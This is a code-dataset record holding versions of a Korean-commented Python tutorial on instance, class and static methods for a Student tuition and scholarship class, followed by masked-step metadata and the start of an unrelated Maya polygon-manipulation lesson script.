<|reserved_special_token_0|>
<|reserved_special_token_0|>
def full_name(self):
return '{} {}'.format(self._first_name, self._last_name)
def detail_info(self):
return 'Student Detail Info : {},{},{},{},{},{}'.format(self._id,
self.full_name(), self._email, self._grade, self._tuition, self
._gpa)
def get_fee(self):
return 'Befor Tuition -> Id: {}, fee: {}'.format(self._id, self.
_tuition)
def get_fee_culc(self):
return 'After tuition -> Id: {}, fee: {}'.format(self._id, self.
_tuition * Student.tuition_per)
def __str__(self):
return 'Student Info - > name: {} grade: {} email: {}'.format(self.
full_name(), self._grade, self._email)
<|reserved_special_token_0|>
@classmethod
def student_const(cls, id, first_name, last_name, email, grade, tuition,
gpa):
return cls(id, first_name, last_name, email, grade, tuition * cls.
tuition_per, gpa)
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Student(object):
<|reserved_special_token_0|>
tuition_per = 1.0
def __init__(self, id, first_name, last_name, email, grade, tuition, gpa):
self._id = id
self._first_name = first_name
self._last_name = last_name
self._email = email
self._grade = grade
self._tuition = tuition
self._gpa = gpa
def full_name(self):
return '{} {}'.format(self._first_name, self._last_name)
def detail_info(self):
return 'Student Detail Info : {},{},{},{},{},{}'.format(self._id,
self.full_name(), self._email, self._grade, self._tuition, self
._gpa)
def get_fee(self):
return 'Befor Tuition -> Id: {}, fee: {}'.format(self._id, self.
_tuition)
def get_fee_culc(self):
return 'After tuition -> Id: {}, fee: {}'.format(self._id, self.
_tuition * Student.tuition_per)
def __str__(self):
return 'Student Info - > name: {} grade: {} email: {}'.format(self.
full_name(), self._grade, self._email)
@classmethod
def raise_fee(cls, per):
if per <= 1:
print('Please Enter 1 or More')
cls.tuition_per = per
print('Succed! tuiton increased')
@classmethod
def student_const(cls, id, first_name, last_name, email, grade, tuition,
gpa):
return cls(id, first_name, last_name, email, grade, tuition * cls.
tuition_per, gpa)
@staticmethod
def is_scholarship_st(inst):
if inst._gpa >= 4.3:
return '{} is a scholarship recipient.'.format(inst._last_name)
return 'Sorry. Not a scholarship recipient'
<|reserved_special_token_0|>
<|reserved_special_token_1|>
class Student(object):
"""
Student Class
Author : Kim
Date : 2020.11.07
Description : Class, Static, Instance Method
"""
tuition_per = 1.0
def __init__(self, id, first_name, last_name, email, grade, tuition, gpa):
self._id = id
self._first_name = first_name
self._last_name = last_name
self._email = email
self._grade = grade
self._tuition = tuition
self._gpa = gpa
def full_name(self):
return '{} {}'.format(self._first_name, self._last_name)
def detail_info(self):
return 'Student Detail Info : {},{},{},{},{},{}'.format(self._id,
self.full_name(), self._email, self._grade, self._tuition, self
._gpa)
def get_fee(self):
return 'Befor Tuition -> Id: {}, fee: {}'.format(self._id, self.
_tuition)
def get_fee_culc(self):
return 'After tuition -> Id: {}, fee: {}'.format(self._id, self.
_tuition * Student.tuition_per)
def __str__(self):
return 'Student Info - > name: {} grade: {} email: {}'.format(self.
full_name(), self._grade, self._email)
@classmethod
def raise_fee(cls, per):
if per <= 1:
print('Please Enter 1 or More')
cls.tuition_per = per
print('Succed! tuiton increased')
@classmethod
def student_const(cls, id, first_name, last_name, email, grade, tuition,
gpa):
return cls(id, first_name, last_name, email, grade, tuition * cls.
tuition_per, gpa)
@staticmethod
def is_scholarship_st(inst):
if inst._gpa >= 4.3:
return '{} is a scholarship recipient.'.format(inst._last_name)
return 'Sorry. Not a scholarship recipient'
<|reserved_special_token_0|>
def is_scholarship(inst):
    """Return a scholarship message for *inst* (reads _gpa and _last_name)."""
    qualified = inst._gpa >= 4.3
    if not qualified:
        return 'Sorry. Not a scholarship recipient'
    return '{} is a scholarship recipient.'.format(inst._last_name)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
#파이썬 심화
#클래스 메소드, 인스턴스 메소드, 스테이틱 메소드
# 기본 인스턴스 메소드
class Student(object):
"""
Student Class
Author : Kim
Date : 2020.11.07
Description : Class, Static, Instance Method
"""
#Class Variable
tuition_per = 1.0
def __init__(self, id, first_name, last_name, email, grade, tuition, gpa):
self._id = id
self._first_name = first_name
self._last_name = last_name
self._email = email
self._grade = grade
self._tuition = tuition
self._gpa = gpa
# Instance Method
def full_name(self):
return '{} {}'.format(self._first_name, self._last_name)
# Instance Method
def detail_info(self):
return 'Student Detail Info : {},{},{},{},{},{}'.format(self._id, self.full_name(), self._email, self._grade, self._tuition, self._gpa)
# Instance Method
def get_fee(self):
return 'Befor Tuition -> Id: {}, fee: {}'.format(self._id, self._tuition)
# Instance Method
def get_fee_culc(self):
return 'After tuition -> Id: {}, fee: {}'.format(self._id, self._tuition*Student.tuition_per)
def __str__(self):
return 'Student Info - > name: {} grade: {} email: {}'.format(self.full_name(), self._grade, self._email)
#Class Method
@classmethod
def raise_fee(cls, per):
if per <= 1:
print('Please Enter 1 or More')
cls.tuition_per = per
print('Succed! tuiton increased')
#Class Method
@classmethod
def student_const(cls, id, first_name, last_name, email, grade, tuition, gpa):
return cls(id, first_name, last_name, email, grade, tuition * cls.tuition_per, gpa)
#Static Method
@staticmethod
def is_scholarship_st(inst):
if inst._gpa >= 4.3:
return '{} is a scholarship recipient.'.format(inst._last_name)
return "Sorry. Not a scholarship recipient"
# Student instances
student_1 = Student(1, "Kim", 'Sarang', 'student1@naver.com', '1', 400, 3.5)
student_2 = Student(2, "Lee", 'Myungho', 'student2@daum.net', '2', 500, 4.3)
# Basic info (via __str__)
print(student_1)
print(student_2)
print()
# Full info
print(student_1.detail_info())
print(student_2.detail_info())
# Tuition info (before the raise)
print(student_1.get_fee())
print(student_2.get_fee())
# Raising tuition without the class method would be a raw assignment:
# Student.tuition_per = 1.2
# Raise tuition through the class method
Student.raise_fee(1.5)
# Tuition info (after the raise)
print(student_1.get_fee_culc())
print(student_2.get_fee_culc())
# Create instances through the class-method constructor
student_3 = Student.student_const(3, 'Park', 'Minji', 'Student3@gmail.com', '3', 550, 4.5)
student_4 = Student.student_const(4, 'Cho', 'Sunghan', 'Student4@gmail.com', '4', 6000, 4.1)
# Full info
print(student_3.detail_info())
print(student_4.detail_info())
print()
# Confirm the adjusted tuition
print(student_3._tuition)
print(student_4._tuition)
print()
# Scholarship check without the static method
def is_scholarship(inst):
    if inst._gpa >= 4.3:
        return '{} is a scholarship recipient.'.format(inst._last_name)
    return "Sorry. Not a scholarship recipient"
print(is_scholarship(student_1))
print(is_scholarship(student_2))
print(is_scholarship(student_3))
print(is_scholarship(student_4))
print()
# Scholarship check through the static method (via the class ...)
print(Student.is_scholarship_st(student_1))
print(Student.is_scholarship_st(student_2))
print(Student.is_scholarship_st(student_3))
print(Student.is_scholarship_st(student_4))
print()
# ... and via an instance (static methods are reachable either way)
print(student_1.is_scholarship_st(student_1))
print(student_2.is_scholarship_st(student_2))
print(student_3.is_scholarship_st(student_3))
print(student_4.is_scholarship_st(student_4))
|
flexible
|
{
"blob_id": "f507fbe7c92134c0a7149aafe7de88debebd42f5",
"index": 7760,
"step-1": "class Student(object):\n <mask token>\n <mask token>\n <mask token>\n\n def full_name(self):\n return '{} {}'.format(self._first_name, self._last_name)\n\n def detail_info(self):\n return 'Student Detail Info : {},{},{},{},{},{}'.format(self._id,\n self.full_name(), self._email, self._grade, self._tuition, self\n ._gpa)\n <mask token>\n\n def get_fee_culc(self):\n return 'After tuition -> Id: {}, fee: {}'.format(self._id, self.\n _tuition * Student.tuition_per)\n <mask token>\n <mask token>\n\n @classmethod\n def student_const(cls, id, first_name, last_name, email, grade, tuition,\n gpa):\n return cls(id, first_name, last_name, email, grade, tuition * cls.\n tuition_per, gpa)\n <mask token>\n\n\n<mask token>\n",
"step-2": "class Student(object):\n <mask token>\n <mask token>\n <mask token>\n\n def full_name(self):\n return '{} {}'.format(self._first_name, self._last_name)\n\n def detail_info(self):\n return 'Student Detail Info : {},{},{},{},{},{}'.format(self._id,\n self.full_name(), self._email, self._grade, self._tuition, self\n ._gpa)\n\n def get_fee(self):\n return 'Befor Tuition -> Id: {}, fee: {}'.format(self._id, self.\n _tuition)\n\n def get_fee_culc(self):\n return 'After tuition -> Id: {}, fee: {}'.format(self._id, self.\n _tuition * Student.tuition_per)\n\n def __str__(self):\n return 'Student Info - > name: {} grade: {} email: {}'.format(self.\n full_name(), self._grade, self._email)\n <mask token>\n\n @classmethod\n def student_const(cls, id, first_name, last_name, email, grade, tuition,\n gpa):\n return cls(id, first_name, last_name, email, grade, tuition * cls.\n tuition_per, gpa)\n <mask token>\n\n\n<mask token>\n",
"step-3": "class Student(object):\n <mask token>\n tuition_per = 1.0\n\n def __init__(self, id, first_name, last_name, email, grade, tuition, gpa):\n self._id = id\n self._first_name = first_name\n self._last_name = last_name\n self._email = email\n self._grade = grade\n self._tuition = tuition\n self._gpa = gpa\n\n def full_name(self):\n return '{} {}'.format(self._first_name, self._last_name)\n\n def detail_info(self):\n return 'Student Detail Info : {},{},{},{},{},{}'.format(self._id,\n self.full_name(), self._email, self._grade, self._tuition, self\n ._gpa)\n\n def get_fee(self):\n return 'Befor Tuition -> Id: {}, fee: {}'.format(self._id, self.\n _tuition)\n\n def get_fee_culc(self):\n return 'After tuition -> Id: {}, fee: {}'.format(self._id, self.\n _tuition * Student.tuition_per)\n\n def __str__(self):\n return 'Student Info - > name: {} grade: {} email: {}'.format(self.\n full_name(), self._grade, self._email)\n\n @classmethod\n def raise_fee(cls, per):\n if per <= 1:\n print('Please Enter 1 or More')\n cls.tuition_per = per\n print('Succed! tuiton increased')\n\n @classmethod\n def student_const(cls, id, first_name, last_name, email, grade, tuition,\n gpa):\n return cls(id, first_name, last_name, email, grade, tuition * cls.\n tuition_per, gpa)\n\n @staticmethod\n def is_scholarship_st(inst):\n if inst._gpa >= 4.3:\n return '{} is a scholarship recipient.'.format(inst._last_name)\n return 'Sorry. Not a scholarship recipient'\n\n\n<mask token>\n",
"step-4": "class Student(object):\n \"\"\"\n Student Class\n Author : Kim\n Date : 2020.11.07\n Description : Class, Static, Instance Method\n \"\"\"\n tuition_per = 1.0\n\n def __init__(self, id, first_name, last_name, email, grade, tuition, gpa):\n self._id = id\n self._first_name = first_name\n self._last_name = last_name\n self._email = email\n self._grade = grade\n self._tuition = tuition\n self._gpa = gpa\n\n def full_name(self):\n return '{} {}'.format(self._first_name, self._last_name)\n\n def detail_info(self):\n return 'Student Detail Info : {},{},{},{},{},{}'.format(self._id,\n self.full_name(), self._email, self._grade, self._tuition, self\n ._gpa)\n\n def get_fee(self):\n return 'Befor Tuition -> Id: {}, fee: {}'.format(self._id, self.\n _tuition)\n\n def get_fee_culc(self):\n return 'After tuition -> Id: {}, fee: {}'.format(self._id, self.\n _tuition * Student.tuition_per)\n\n def __str__(self):\n return 'Student Info - > name: {} grade: {} email: {}'.format(self.\n full_name(), self._grade, self._email)\n\n @classmethod\n def raise_fee(cls, per):\n if per <= 1:\n print('Please Enter 1 or More')\n cls.tuition_per = per\n print('Succed! tuiton increased')\n\n @classmethod\n def student_const(cls, id, first_name, last_name, email, grade, tuition,\n gpa):\n return cls(id, first_name, last_name, email, grade, tuition * cls.\n tuition_per, gpa)\n\n @staticmethod\n def is_scholarship_st(inst):\n if inst._gpa >= 4.3:\n return '{} is a scholarship recipient.'.format(inst._last_name)\n return 'Sorry. Not a scholarship recipient'\n\n\n<mask token>\n\n\ndef is_scholarship(inst):\n if inst._gpa >= 4.3:\n return '{} is a scholarship recipient.'.format(inst._last_name)\n return 'Sorry. Not a scholarship recipient'\n\n\n<mask token>\n",
"step-5": "#파이썬 심화\r\n#클래스 메소드, 인스턴스 메소드, 스테이틱 메소드\r\n\r\n# 기본 인스턴스 메소드\r\n\r\nclass Student(object):\r\n \"\"\"\r\n Student Class\r\n Author : Kim\r\n Date : 2020.11.07\r\n Description : Class, Static, Instance Method\r\n \"\"\"\r\n\r\n #Class Variable\r\n tuition_per = 1.0\r\n\r\n def __init__(self, id, first_name, last_name, email, grade, tuition, gpa):\r\n self._id = id\r\n self._first_name = first_name\r\n self._last_name = last_name\r\n self._email = email\r\n self._grade = grade\r\n self._tuition = tuition\r\n self._gpa = gpa\r\n\r\n # Instance Method\r\n def full_name(self):\r\n return '{} {}'.format(self._first_name, self._last_name)\r\n\r\n # Instance Method\r\n def detail_info(self):\r\n return 'Student Detail Info : {},{},{},{},{},{}'.format(self._id, self.full_name(), self._email, self._grade, self._tuition, self._gpa)\r\n \r\n # Instance Method\r\n def get_fee(self):\r\n return 'Befor Tuition -> Id: {}, fee: {}'.format(self._id, self._tuition)\r\n\r\n # Instance Method\r\n def get_fee_culc(self):\r\n return 'After tuition -> Id: {}, fee: {}'.format(self._id, self._tuition*Student.tuition_per)\r\n\r\n def __str__(self):\r\n return 'Student Info - > name: {} grade: {} email: {}'.format(self.full_name(), self._grade, self._email)\r\n\r\n #Class Method\r\n @classmethod\r\n def raise_fee(cls, per):\r\n if per <= 1:\r\n print('Please Enter 1 or More')\r\n cls.tuition_per = per\r\n print('Succed! tuiton increased')\r\n\r\n #Class Method\r\n @classmethod\r\n def student_const(cls, id, first_name, last_name, email, grade, tuition, gpa):\r\n return cls(id, first_name, last_name, email, grade, tuition * cls.tuition_per, gpa)\r\n\r\n #Static Method\r\n @staticmethod\r\n def is_scholarship_st(inst):\r\n if inst._gpa >= 4.3:\r\n return '{} is a scholarship recipient.'.format(inst._last_name)\r\n return \"Sorry. 
Not a scholarship recipient\"\r\n\r\n \r\n\r\n#학생 인스턴스\r\nstudent_1 = Student(1, \"Kim\", 'Sarang', 'student1@naver.com', '1', 400, 3.5)\r\nstudent_2 = Student(2, \"Lee\", 'Myungho', 'student2@daum.net', '2', 500, 4.3)\r\n\r\n# 기본 정보\r\nprint(student_1)\r\nprint(student_2)\r\n\r\nprint()\r\n\r\n#전체 정보\r\nprint(student_1.detail_info())\r\nprint(student_2.detail_info())\r\n\r\n#학비 정보(인상전)\r\nprint(student_1.get_fee())\r\nprint(student_2.get_fee())\r\n\r\n#학비 인상 (클래스 매소드 미사용)\r\n# Student.tuition_per = 1.2\r\n\r\n#학비 인상 (클래스 매소드 사용)\r\nStudent.raise_fee(1.5)\r\n\r\n#학비 정보(인상후)\r\nprint(student_1.get_fee_culc())\r\nprint(student_2.get_fee_culc())\r\n\r\n# 클래스 메소드 인스턴스 생성 실습\r\nstudent_3 = Student.student_const(3, 'Park', 'Minji', 'Student3@gmail.com', '3', 550, 4.5)\r\nstudent_4 = Student.student_const(4, 'Cho', 'Sunghan', 'Student4@gmail.com', '4', 6000, 4.1)\r\n\r\n# 전체 정보\r\nprint(student_3.detail_info())\r\nprint(student_4.detail_info())\r\nprint()\r\n\r\n#학생 학비 변경 확인\r\nprint(student_3._tuition)\r\nprint(student_4._tuition)\r\nprint()\r\n\r\n# 장학금 혜택 여부(스테이틱 메소드 미사용)\r\ndef is_scholarship(inst):\r\n if inst._gpa >= 4.3:\r\n return '{} is a scholarship recipient.'.format(inst._last_name)\r\n return \"Sorry. Not a scholarship recipient\"\r\n\r\nprint(is_scholarship(student_1))\r\nprint(is_scholarship(student_2))\r\nprint(is_scholarship(student_3))\r\nprint(is_scholarship(student_4))\r\n\r\nprint()\r\n\r\n# 장학금 혜택 여부(스테이틱 메소드 사용)\r\nprint(Student.is_scholarship_st(student_1))\r\nprint(Student.is_scholarship_st(student_2))\r\nprint(Student.is_scholarship_st(student_3))\r\nprint(Student.is_scholarship_st(student_4))\r\n\r\nprint()\r\n\r\nprint(student_1.is_scholarship_st(student_1))\r\nprint(student_2.is_scholarship_st(student_2))\r\nprint(student_3.is_scholarship_st(student_3))\r\nprint(student_4.is_scholarship_st(student_4))",
"step-ids": [
5,
7,
11,
13,
16
]
}
|
[
5,
7,
11,
13,
16
] |
import sys
import os
import utils
def run(name, dim_k, dump='dump', add_cmd=''):
    """Launch main.py for the model registered under *name* in all_res.

    Args:
        name: key into the module-level all_res mapping.
        dim_k: embedding dimension, passed as -k.
        dump: dump flag to set ('dump' or 'dump_all').
        add_cmd: extra command-line flags appended verbatim.
    """
    res = all_res[name]
    # Restore names shaped like 'id_att_3' select the attention model.
    model = 'ATT_ts' if res.split('_')[1] == 'att' else 'LastItem'
    cmd = f'python main.py -model={model} -ds=v3 -restore_model={res} -k={dim_k} -show_detail -{dump} -nb_topk=2000 -nb_rare_k=1000 -msg={name} {add_cmd}'
    print(cmd)
    ret = os.system(cmd)
    if ret != 0:
        # Pause so a failed run is noticed before the next one starts.
        input('Error!!!!!!')
# Mapping from experiment name to the checkpoint to restore (identity here).
all_res = {
    'id_att_3': 'id_att_3',
    'id_last': 'id_last',
    'c_att_5': 'c_att_5',
    'c_last': 'c_last',
}
def main():
    """Run every experiment twice: validation dumps first, then full dumps."""
    configs = [
        ('id_att_3', 1024, ''),
        ('id_last', 1024, ''),
        ('c_att_5', 256, '-seq_length=5'),
        ('c_last', 256, ''),
    ]
    # First pass: regular dump (validation included).
    for name, dim_k, extra in configs:
        run(name, dim_k, dump='dump', add_cmd=extra)
    # Second pass: dump everything and skip validation.
    for name, dim_k, extra in configs:
        flags = '-skip_vali' if not extra else '-skip_vali ' + extra
        run(name, dim_k, dump='dump_all', add_cmd=flags)
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "548a236c4c485091d312593dcb0fa331ff98f1a8",
"index": 6359,
"step-1": "<mask token>\n\n\ndef run(name, dim_k, dump='dump', add_cmd=''):\n res = all_res[name]\n model = 'ATT_ts' if res.split('_')[1] == 'att' else 'LastItem'\n cmd = (\n f'python main.py -model={model} -ds=v3 -restore_model={res} -k={dim_k} -show_detail -{dump} -nb_topk=2000 -nb_rare_k=1000 -msg={name} {add_cmd}'\n )\n print(cmd)\n ret = os.system(cmd)\n if ret != 0:\n input('Error!!!!!!')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef run(name, dim_k, dump='dump', add_cmd=''):\n res = all_res[name]\n model = 'ATT_ts' if res.split('_')[1] == 'att' else 'LastItem'\n cmd = (\n f'python main.py -model={model} -ds=v3 -restore_model={res} -k={dim_k} -show_detail -{dump} -nb_topk=2000 -nb_rare_k=1000 -msg={name} {add_cmd}'\n )\n print(cmd)\n ret = os.system(cmd)\n if ret != 0:\n input('Error!!!!!!')\n\n\n<mask token>\n\n\ndef main():\n run('id_att_3', 1024, dump='dump')\n run('id_last', 1024, dump='dump')\n run('c_att_5', 256, dump='dump', add_cmd='-seq_length=5')\n run('c_last', 256, dump='dump')\n run('id_att_3', 1024, dump='dump_all', add_cmd='-skip_vali')\n run('id_last', 1024, dump='dump_all', add_cmd='-skip_vali')\n run('c_att_5', 256, dump='dump_all', add_cmd='-skip_vali -seq_length=5')\n run('c_last', 256, dump='dump_all', add_cmd='-skip_vali')\n\n\nif __name__ == '__main__':\n main()\n",
"step-3": "<mask token>\n\n\ndef run(name, dim_k, dump='dump', add_cmd=''):\n res = all_res[name]\n model = 'ATT_ts' if res.split('_')[1] == 'att' else 'LastItem'\n cmd = (\n f'python main.py -model={model} -ds=v3 -restore_model={res} -k={dim_k} -show_detail -{dump} -nb_topk=2000 -nb_rare_k=1000 -msg={name} {add_cmd}'\n )\n print(cmd)\n ret = os.system(cmd)\n if ret != 0:\n input('Error!!!!!!')\n\n\nall_res = dict(id_att_3='id_att_3', id_last='id_last', c_att_5='c_att_5',\n c_last='c_last')\n\n\ndef main():\n run('id_att_3', 1024, dump='dump')\n run('id_last', 1024, dump='dump')\n run('c_att_5', 256, dump='dump', add_cmd='-seq_length=5')\n run('c_last', 256, dump='dump')\n run('id_att_3', 1024, dump='dump_all', add_cmd='-skip_vali')\n run('id_last', 1024, dump='dump_all', add_cmd='-skip_vali')\n run('c_att_5', 256, dump='dump_all', add_cmd='-skip_vali -seq_length=5')\n run('c_last', 256, dump='dump_all', add_cmd='-skip_vali')\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "import sys\nimport os\nimport utils\n\n\ndef run(name, dim_k, dump='dump', add_cmd=''):\n res = all_res[name]\n model = 'ATT_ts' if res.split('_')[1] == 'att' else 'LastItem'\n cmd = (\n f'python main.py -model={model} -ds=v3 -restore_model={res} -k={dim_k} -show_detail -{dump} -nb_topk=2000 -nb_rare_k=1000 -msg={name} {add_cmd}'\n )\n print(cmd)\n ret = os.system(cmd)\n if ret != 0:\n input('Error!!!!!!')\n\n\nall_res = dict(id_att_3='id_att_3', id_last='id_last', c_att_5='c_att_5',\n c_last='c_last')\n\n\ndef main():\n run('id_att_3', 1024, dump='dump')\n run('id_last', 1024, dump='dump')\n run('c_att_5', 256, dump='dump', add_cmd='-seq_length=5')\n run('c_last', 256, dump='dump')\n run('id_att_3', 1024, dump='dump_all', add_cmd='-skip_vali')\n run('id_last', 1024, dump='dump_all', add_cmd='-skip_vali')\n run('c_att_5', 256, dump='dump_all', add_cmd='-skip_vali -seq_length=5')\n run('c_last', 256, dump='dump_all', add_cmd='-skip_vali')\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "import sys\nimport os\nimport utils\n\ndef run(name, dim_k, dump='dump', add_cmd=''):\n res = all_res[name]\n model = 'ATT_ts' if res.split('_')[1] == 'att' else 'LastItem'\n\n cmd = f'python main.py -model={model} -ds=v3 -restore_model={res} -k={dim_k} -show_detail -{dump} -nb_topk=2000 -nb_rare_k=1000 -msg={name} {add_cmd}'\n print(cmd)\n\n ret = os.system(cmd)\n if ret != 0:\n input('Error!!!!!!')\n\nall_res = dict(\n id_att_3='id_att_3',\n id_last='id_last',\n\n c_att_5='c_att_5',\n c_last='c_last',\n)\n\n\ndef main():\n run('id_att_3', 1024, dump='dump')\n run('id_last', 1024, dump='dump')\n run('c_att_5', 256, dump='dump', add_cmd='-seq_length=5')\n run('c_last', 256, dump='dump')\n\n run('id_att_3', 1024, dump='dump_all', add_cmd='-skip_vali')\n run('id_last', 1024, dump='dump_all', add_cmd='-skip_vali')\n run('c_att_5', 256, dump='dump_all', add_cmd='-skip_vali -seq_length=5')\n run('c_last', 256, dump='dump_all', add_cmd='-skip_vali')\n\n\n\nif __name__ == '__main__':\n main()",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
"""
get poly data(face center, face id, etc), select face, create object by face data
setPosition for vertex (random)
import sys
module_path = '/home/shrimo/Desktop/course/git/vfx_dev/maya/general_lesson'
if module_path not in sys.path:
sys.path.append(module_path)
import lesson_v01
reload(lesson_v01)
lesson_v01.start()
"""
import maya.cmds as cmds
import maya.api.OpenMaya as om2
import random
class Face:
    """Container for one mesh component: its path, index, points and center."""

    def __init__(self, shape, face_index, vertex, center):
        # Maya component path, e.g. 'meshShape.f[12]'.
        self.face_path = '{}.f[{}]'.format(shape, face_index)
        self.vertex = vertex
        self.face_index = face_index
        self.face_center = center
def get_shapes():
    """Return the shape nodes under the current Maya selection.

    dagObjects=True walks the selected transforms' hierarchies, so the
    shapes themselves need not be selected directly.
    """
    # print(cmds.ls())
    # print(cmds.ls(selection=True))
    return cmds.ls(selection=True, shapes=True, dagObjects=True)
def get_faces(shapes):
    """Collect a Face record per polygon: index, world-space points, center.

    Args:
        shapes: iterable of Maya shape node names.

    Returns:
        list of Face objects, one per polygon across all shapes.
    """
    # cmds.select(clear=True)
    # print(shapes)
    face_data = []
    for shape in shapes:
        mSel = om2.MSelectionList()
        mSel.add(shape)
        mDagPath, mObj = mSel.getComponent(0)
        geo = om2.MItMeshPolygon(mDagPath, mObj)
        while not geo.isDone():
            center = geo.center()
            print 'face index: {}'.format(geo.index())
            vertices = []
            # Store each point as a plain (x, y, z) tuple.
            for i in geo.getPoints(om2.MSpace.kWorld):
                vertices.append((i[0], i[1], i[2]))
            face_in = Face(shape, geo.index(), vertices, center)
            face_data.append(face_in)
            # NOTE(review): next(0) passes a dummy arg -- confirm against the
            # MItMeshPolygon API version in use.
            geo.next(0)
    return face_data
def get_vertex(shapes):
vertex_data = []
spc = om2.MSpace.kWorld
for shape in shapes:
mSel = om2.MSelectionList()
mSel.add(shape)
mDagPath, mObj = mSel.getComponent(0)
vtx = om2.MItMeshVertex(mDagPath, mObj)
while not vtx.isDone():
vtx_pos = vtx.position(spc)
print 'vertex index: {}'.format(vtx.index()), vtx_pos
face_in = Face(shape, vtx.index(), vtx_pos, None)
vertex_data.append(face_in)
vtx.next()
return vertex_data
def set_pos_vertex(shapes, up_y):
spc = om2.MSpace.kWorld
for shape in shapes:
mSel = om2.MSelectionList()
mSel.add(shape)
mDagPath, mObj = mSel.getComponent(0)
vtx = om2.MItMeshVertex(mDagPath, mObj)
while not vtx.isDone():
vtx_pos = vtx.position(spc)
print 'vertex:'+str(vtx.index()), vtx_pos.y
if vtx.index() & 1:
vtx_pos.y += up_y
vtx.setPosition(vtx_pos, spc)
vtx.next()
vtx.updateSurface()
def set_random_vertex(shapes, up_y):
spc = om2.MSpace.kWorld
for shape in shapes:
mSel = om2.MSelectionList()
mSel.add(shape)
mDagPath, mObj = mSel.getComponent(0)
vtx = om2.MItMeshVertex(mDagPath, mObj)
while not vtx.isDone():
vtx_pos = vtx.position(spc)
print 'vertex:'+str(vtx.index()), vtx_pos.y
vtx_pos.z += random.uniform(0, up_y)
vtx.setPosition(vtx_pos, spc)
vtx.next()
vtx.updateSurface()
def create_boxes(shapes, group_name, shape_name, on_face):
    """Create a small polyCube at every odd-indexed face centre or vertex.

    shapes:     shape nodes to sample (see get_shapes()).
    group_name: name of a new empty group that receives all created cubes.
    shape_name: prefix for generated cube names (prefix + component index).
    on_face:    truthy -> place cubes at face centres; falsy -> at vertices.

    NOTE(review): this relies on Maya's implicit current-selection state
    (cmds.select calls are interleaved with creation and parenting), so the
    statement order below is significant.
    """
    if on_face:
        face_data = get_faces(shapes)
    else:
        face_data = get_vertex(shapes)
    # Empty group that will parent every generated cube.
    cmds.group(em=True, name=group_name)
    for face in face_data:
        # print(face.face_index, face.face_path, face.face_center)
        if face.face_index & 1:  # odd component indices only
            cmds.select(face.face_path, add=True)
            p_name = shape_name + str(face.face_index)
            cmds.polyCube(n=p_name) # create polyCube name by p_ + face index
            cmds.setAttr(p_name+'.scale', 0.3, 0.3, 0.3)
            if on_face:
                # Face records store the centre as an indexable point.
                cmds.setAttr(
                    p_name+'.translate', face.face_center[0], face.face_center[1], face.face_center[2])
            else:
                # Vertex records store an MPoint-like object with x/y/z.
                cmds.setAttr(p_name+'.translate', face.vertex.x,
                             face.vertex.y, face.vertex.z)
            cmds.select(all=True)
            cmds.parent(p_name, group_name)
            # cmds.group(p_name, parent=group_name)
    cmds.select(all=True)
def start():
    """Entry point: build cubes named 'v_<index>' at odd vertices of the selection.

    The commented lines are alternative experiments kept from the lesson
    (direct vertex moves / random jitter).
    """
    # shapes = cmds.ls(selection=True, shapes=True, dagObjects=True)
    # set_pos_vertex(get_shapes(), 1)
    # set_random_vertex(get_shapes(), 1)
    create_boxes(get_shapes(), 'boxes', 'v_', 0)
|
normal
|
{
"blob_id": "723d8819b5341f1397163533f59c17ba1a74b77d",
"index": 1310,
"step-1": "\"\"\"\nget poly data(face center, face id, etc), select face, create object by face data\nsetPosition for vertex (random)\n\nimport sys\nmodule_path = '/home/shrimo/Desktop/course/git/vfx_dev/maya/general_lesson'\nif module_path not in sys.path:\n sys.path.append(module_path)\n \n\nimport lesson_v01\nreload(lesson_v01)\nlesson_v01.start()\n\"\"\"\n\n\nimport maya.cmds as cmds\nimport maya.api.OpenMaya as om2\nimport random\n\n\nclass Face():\n def __init__(self, shape, face_index, vertex, center):\n self.face_path = '{shape}.f[{index}]'.format(\n shape=shape,\n index=face_index)\n self.vertex = vertex\n self.face_index = face_index\n self.face_center = center\n\n\ndef get_shapes():\n # get selected object\n # print(cmds.ls())\n # print(cmds.ls(selection=True))\n return cmds.ls(selection=True, shapes=True, dagObjects=True)\n\n\ndef get_faces(shapes):\n # cmds.select(clear=True)\n # print(shapes)\n face_data = []\n for shape in shapes:\n mSel = om2.MSelectionList()\n mSel.add(shape)\n mDagPath, mObj = mSel.getComponent(0)\n geo = om2.MItMeshPolygon(mDagPath, mObj)\n while not geo.isDone():\n center = geo.center()\n print 'face index: {}'.format(geo.index())\n vertices = []\n for i in geo.getPoints(om2.MSpace.kWorld):\n vertices.append((i[0], i[1], i[2]))\n face_in = Face(shape, geo.index(), vertices, center)\n face_data.append(face_in)\n geo.next(0)\n\n return face_data\n\n\ndef get_vertex(shapes):\n vertex_data = []\n spc = om2.MSpace.kWorld\n for shape in shapes:\n mSel = om2.MSelectionList()\n mSel.add(shape)\n mDagPath, mObj = mSel.getComponent(0)\n vtx = om2.MItMeshVertex(mDagPath, mObj)\n while not vtx.isDone():\n vtx_pos = vtx.position(spc)\n print 'vertex index: {}'.format(vtx.index()), vtx_pos\n face_in = Face(shape, vtx.index(), vtx_pos, None)\n vertex_data.append(face_in)\n vtx.next()\n\n return vertex_data\n\n\ndef set_pos_vertex(shapes, up_y):\n spc = om2.MSpace.kWorld\n for shape in shapes:\n mSel = om2.MSelectionList()\n mSel.add(shape)\n 
